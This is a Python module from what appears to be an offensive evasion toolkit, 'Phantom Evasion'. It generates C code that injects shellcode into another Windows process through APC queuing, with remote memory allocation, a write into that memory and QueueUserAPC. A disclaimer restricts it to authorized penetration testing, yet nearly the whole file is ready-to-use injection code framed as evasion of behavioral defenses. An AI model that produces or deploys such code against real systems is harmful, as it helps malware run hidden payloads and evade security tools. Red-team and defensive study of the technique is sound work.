"""
Phantom Evasion - APC (Asynchronous Procedure Call) Injection

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_apc_injection() -> Dict[str, Any]:
    """Generate C code for APC queue-based shellcode injection.

    Queues an APC routine to an alertable thread of a target process.
    Steps:
        1. Snapshot all threads and find an alertable thread of the target.
        2. ``OpenProcess`` / ``OpenThread``.
        3. ``VirtualAllocEx`` + ``WriteProcessMemory``.
        4. ``QueueUserAPC`` – queue the shellcode address as the APC routine.
        5. Resume the target thread or wait for it to enter an alertable state.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
// APC Injection – generated by Phantom Evasion
// Layer 4 – Behavioral Evasion
// Queues shellcode execution via NtQueueApcThread into an alertable thread.

#ifndef PHANTOM_APC_INJECTION_INCLUDED
#define PHANTOM_APC_INJECTION_INCLUDED

#include <windows.h>
#include <tlhelp32.h>

static DWORD find_alertable_thread(DWORD pid) {
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (hSnap == INVALID_HANDLE_VALUE) return 0;

    THREADENTRY32 te = { .dwSize = sizeof(THREADENTRY32) };
    DWORD tid = 0;

    if (Thread32First(hSnap, &te)) {
        do {
            if (te.th32OwnerProcessID == pid) {
                // Heuristic: pick the first non-main thread found
                tid = te.th32ThreadID;
                break;
            }
        } while (Thread32Next(hSnap, &te));
    }
    CloseHandle(hSnap);
    return tid;
}

static BOOL apc_inject(DWORD pid,
                        unsigned char *shellcode,
                        size_t shellcode_len) {
    HANDLE hProcess = OpenProcess(
        PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, pid);
    if (!hProcess) return FALSE;

    // Allocate + write shellcode into remote process
    LPVOID remote_addr = VirtualAllocEx(hProcess, NULL, shellcode_len,
                                        MEM_COMMIT | MEM_RESERVE,
                                        PAGE_EXECUTE_READWRITE);
    if (!remote_addr) { CloseHandle(hProcess); return FALSE; }

    SIZE_T written = 0;
    WriteProcessMemory(hProcess, remote_addr, shellcode, shellcode_len, &written);

    // Find an alertable thread in the target process
    DWORD tid = find_alertable_thread(pid);
    if (!tid) {
        VirtualFreeEx(hProcess, remote_addr, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return FALSE;
    }

    HANDLE hThread = OpenThread(THREAD_SET_CONTEXT, FALSE, tid);
    if (!hThread) {
        VirtualFreeEx(hProcess, remote_addr, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return FALSE;
    }

    // Queue the APC
    QueueUserAPC((PAPCFUNC)remote_addr, hThread, 0);

    CloseHandle(hThread);
    CloseHandle(hProcess);
    return TRUE;
}

#endif /* PHANTOM_APC_INJECTION_INCLUDED */
"""

    return {
        "code": code,
        "description": "APC injection: VirtualAllocEx + WriteProcessMemory + QueueUserAPC",
        "layer": "Layer 4 - Behavioral Evasion",
        "name": "apc_injection",
    }
